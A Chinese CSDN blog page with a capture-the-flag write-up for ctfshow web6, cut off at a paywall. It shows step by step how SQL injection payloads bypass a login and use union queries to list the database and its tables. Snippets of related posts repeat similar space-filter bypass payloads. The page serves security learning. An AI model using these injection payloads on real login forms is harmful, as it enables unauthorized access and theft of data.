2024年网安最全ctfshow-WEB-web6_ctf(3)

最新推荐文章于 2024-09-18 22:33:47 发布

2401_84264583

最新推荐文章于 2024-09-18 22:33:47 发布

阅读量763

点赞数 12

分类专栏：程序员文章标签：前端

本文链接：https://blog.csdn.net/2401_84264583/article/details/138407205

版权

文章讲述了利用SQL注入技术逐步获取数据库信息的过程，包括检测使用的数据库、获取表名、字段和flag数据，同时强调了网络安全学习的重要性，推荐了系统化的学习资源和网络安全圈子

摘要由CSDN通过智能技术生成

先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输

a'or(true)#

成功登录

既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输

a'or(true)union(select(1),database(),3)#

当前数据库是web2

接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错

a'or(true)union(select(1),
(select(group_concat(table_name))from(information_schema.tables)
where(table_schema='web2'))
,3)#

成功获取数据库中的表 flag , user

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2401_84264583

关注关注

12
点赞
踩
15

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

CTFshow之web6

世间繁华梦一出

05-07

2605

CTFshow——web6 一打开页面是用户名密码登录，我们首先第一个想到的就是sql注入了，来用万能钥匙试一哈！报错了然后，我在密码框里同样注入万能钥匙试了一下，发现，密码框中输入空格也会多一个黑点，于是我猜测可能是把空格过滤了，为了验证我的猜想，来抓包看一下服务器收到的页面请求包最后传递的用户名和密码的参数值是什么样子的抓包果然发现，空格被过滤了一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格我们就选用/**/来替

2401_84297899的博客

05-03

1073

ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。

参与评论您还未登录，请先登录后发表或查看评论

CTFshow WEB入门--web6

m0_73912575的博客

10-29

285

CTFshow WEB入门--web6

CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)

热门推荐

wangyuxiang946的博客

08-21

1万+

ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输 a'or(true)# 成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输 a'or(true)union(select(1),datab...

ctfshow-web6

aarong的博客

12-22

1567

如题又是登录框先试试看看能不能登录 ' or 1=1# 发现出现了错误：sql inject error 用burp抓包发现，过滤了空格空格被注释掉了，所以想办法把空格给替代掉通过这篇文章得到注释的方法有两种，那就是注释符/* */和%a0 '/**/or/**/1=1# 发现可以登录：接下来就是手工注入的流程了 order by 查询字段为3： username='/**/or/**/1=1/**/order/**/by/**/3#&password=123 回显的字段数

CTF Show Web6

qq_62566956的博客

03-28

329

在上一题的wp中，看到了工具fzbk，使用之后发现所有备份文件都返回200= =，问了问群主之后发现这是nginx服务器的设置：遇到不存在的路径就直接跳转到默认的主页面，所以导致fzbk认为所有文件都可能存在。扫到备份文件之后直接访问，在www.zip中得到。解压源码到当前目录，测试正常，收工。因为fzbk有bug，再也不用了。直接访问txt文件即可。

ctfshow web6

博客地址 www.sec0nd.top

02-24

458

题目分析题目是一个登陆页面，猜测可能是sql注入类的题目尝试一下万能密码 username=admin'/**/or/**/1=1#&password=1 发现有过滤，要找出来是过滤了哪个字符，依次输入验证，发现是过滤了空格那么就要绕过空格，有以下几种方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格详细见下面这篇文章https://blog.csdn.net/weixin_39945475/article/details/10990395

2024年网安最全ctfshow-WEB-web3_ctfshow web3

2401_84264610的博客

05-01

php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。

2024年网安最全ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9

2401_84264610的博客

05-01

917

进去以后就是一个登录界面, 盲猜是个SQL注入漏洞首先, 我们访问根目录下的 robots.txt 文件robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则( 哪些文件可以爬取,哪些文件不可以爬取)从robots.txt文件的内容中可以发现, 作者给了提示, index.phps文件应该就是此关卡的源码文件接下来, 我们访问 /index.phps 文件, 将其下载到本地, 从源码中可以发现, SQL中使用了md5()函数加密, 我们可以利用MD5加密漏洞来绕过。

2024年网安最全CTFShow-MISC入门篇详细wp(1-56)_ctfshow misc入门

2401_84264583的博客

05-01

1203

magicexif元数据编辑器是一款非常专业的照片magicexif元数据编辑器，该软件可以通过分析照片的元数据以及编码特征来计算图像可信度，从而判断照片是否被修改，同时还能对相机的快门次数、镜头参数、光圈档位等进行查看和编辑。

CTF_ctfshow_web6

weixin_54227009的博客

05-13

478

过滤了空格一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格这里选择/**/ 1'/**/union/**/select/**/1,2,3# 回显为2 查看数据库名: 1'/**/union/**/select/**/1,database(),3# 查看表名: 1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_sc

Ctfshow web-web6 WP

qq_45427131的博客

05-12

468

Ctfshow web-we6 WP 进去看见一个login界面，看上去有点眼熟，好像做过，但是尝试之前做过的方法，回显始终是sql infect error，这样的回显表示输入的值中有非法字符，最后尝试下来是空格被顾虑了，用/**/代替原来 union select 1,2,3 Web6: union/**/select/**/1,2,3 这样的话，传统艺能手工注入判断显示位获取当前连接的数据库获取数据库中所有表的表名： Select table_name from informatio

ctfshow-萌新-web6（利用二进制绕过获取网站敏感信息）

wangyuxiang946的博客

09-10

1万+

ctf.show萌新模块 web6关，这一关的考点是intval()函数转换字符串的特性，以及SQL注入漏洞的绕过方式，源码中过滤了单双引号，or，加减乘除号，叹号，异或，hex，select等关键字，推荐使用二进制绕过页面中展示了部分源码，并提示我们 id=1000 时，就是flag 这里先上答案，payload如下 ?id=0b1111101000 接下来详细解释一下解题的思路，首先是利用intval()函数转换字符串的特性进行绕过 intval()函数...

CTF.show：web6

qq_46230755的博客

01-15

457

登陆窗，先想到sql注入抓包测试发现失败利用/**/代替空格进行绕过 username=admin'/**/or/**/1=1#&password=123456 利用联合查询找到回显位置 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456 查数据库名 username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3

CTF show WEB6

羽的博客

02-15

3938

1.尝试万能密码 username=admin’ or 1=1#&password=1 显示sql inject error，发现有字符被过滤。逐个字符输入后发现过滤了空格，一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格这里选择/**/ username=admin’/**/or/**/1=1#&passw...

Java实现七牛云文件或图片上传下载_七牛云上传下载连接接口(1)

2301_79985178的博客

06-20

279

但这里还是有两个注意的地方，一个是method属性，一个是enctype属性。免费免费免费而且注册之后每个月有免费100 万次get请求。10G免费空间，10G免费流量，对于搭建自己的博客网站已经绰绰有余了。

ctf_show_web6

Nothing-one的博客

11-22

3174

打开题目后我们可以看到这个这里我们用bp工具进行

CTFShow-Web6

09-06

根据提供的引用内容，CTFShow-Web6可能是一个数据库名。其中，通过注入语句查询数据库web2中的表信息，得到两张表flag和user。具体的注入语句如下所示： ``` username=1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1 ``` ``` username='/**/or/**/1=2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123 ``` 通过这些注入语句可以得到数据库web2中的两张表信息，分别为flag和user。123 #### 引用[.reference_title] - *1* *2* [CTFshow之web6](https://blog.csdn.net/zzwwhhpp/article/details/116498386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web6](https://blog.csdn.net/weixin_52497013/article/details/122095160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]